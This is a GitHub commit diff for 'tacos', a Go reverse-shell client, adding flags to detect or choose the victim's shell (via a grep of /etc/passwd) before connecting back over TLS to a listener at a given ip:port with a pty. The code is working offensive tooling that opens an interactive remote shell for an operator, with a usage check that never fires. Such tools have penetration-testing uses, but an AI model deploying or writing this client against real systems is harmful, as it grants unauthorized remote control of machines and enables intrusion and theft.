Add shell detection and flag

ariary · Feb 28, 2022 · 4dca57a · 4dca57a
1 parent c22bbe8
commit 4dca57a
Show file tree

Hide file tree

Showing 2 changed files with 36 additions and 11 deletions.
diff --git a/cmd/tacos/tacos.go b/cmd/tacos/tacos.go
@@ -1,16 +1,30 @@
 package main
 
 import (
+	"flag"
+	"fmt"
 	"os"
 
 	"github.com/ariary/tacos/pkg/tacos"
 )
 
-//https://gist.github.com/yougg/b47f4910767a74fcfe1077d21568070e?permalink_comment_id=3425797#gistcomment-3425797
-// and https://github.com/creack/pty#shell
-//https://github.com/iximiuz/ptyme/blob/master/attach.go
 func main() {
-	shell := tacos.DefaultShell()
-	remote := os.Args[1]
+	var detect bool
+	var shell string
+	flag.BoolVar(&detect, "detect", false, "Detect default shell to use it in reverse shell")
+	flag.StringVar(&shell, "shell", "", "shell to use for reverse shell") //default /bin/bash
+	flag.Parse()
+
+	if detect {
+		shell = tacos.DetectDefaultShell()
+	}
+
+	if len(os.Args) < 1 {
+		fmt.Println("Usage: tacos [listener_url]:[port]")
+		os.Exit(1)
+	}
+
+	remote := flag.Arg(0)
+
 	tacos.ReverseShell(remote, shell)
 }
diff --git a/pkg/tacos/tacos.go b/pkg/tacos/tacos.go
@@ -2,26 +2,37 @@ package tacos
 
 import (
 	"crypto/tls"
+	"fmt"
 	"io"
 	"log"
 	"os"
 	"os/exec"
 	"os/signal"
+	"strings"
 	"syscall"
 
 	"github.com/ariary/go-utils/pkg/logger"
 	"github.com/creack/pty"
 	"golang.org/x/term"
 )
 
-//DefaultShell: return the default shell
-func DefaultShell() string {
+//DetectDefaultShell: return the default shell
+func DetectDefaultShell() string {
 	//Determine default shell
 	//macOS
 	//dscl . -read ~/ UserShell
 	//linux
 	//grep ^$(id -un): /etc/passwd | cut -d : -f 7-
-	return "/bin/bash"
+	command := "grep ^$(id -un): /etc/passwd | cut -d : -f 7-"
+	defaultShell, err := exec.Command("sh", "-c", command).Output()
+	if err != nil {
+		log.Fatal(err)
+		fmt.Sprintf("Failed to retrieve default shell, use sh %s", command)
+		return "/bin/sh"
+	}
+	shell := string(defaultShell)
+	shell = strings.ReplaceAll(shell, "\n", "")
+	return shell
 }
 
 //ReverseShell: spawn a reverse shell with pty targeting host (ip:port)
@@ -36,12 +47,12 @@ func ReverseShell(host string, shell string) {
 	}
 
 	var args []string
-	switch shell {
-	case "bin/bash":
+	if strings.Contains(shell, "bash") {
 		args = append(args, "-li")
-	case "/bin/sh", "/bin/zsh", "/bin/csh", "/bin/tcsh":
+	} else if strings.Contains(shell, "zsh") || strings.Contains(shell, "csh") || strings.Contains(shell, "tsh") || strings.Contains(shell, "/sh") {
 		args = append(args, "-i")
 	}
+
 	cmd := exec.Command(shell, args...)
 
 	// Start the command with a pty.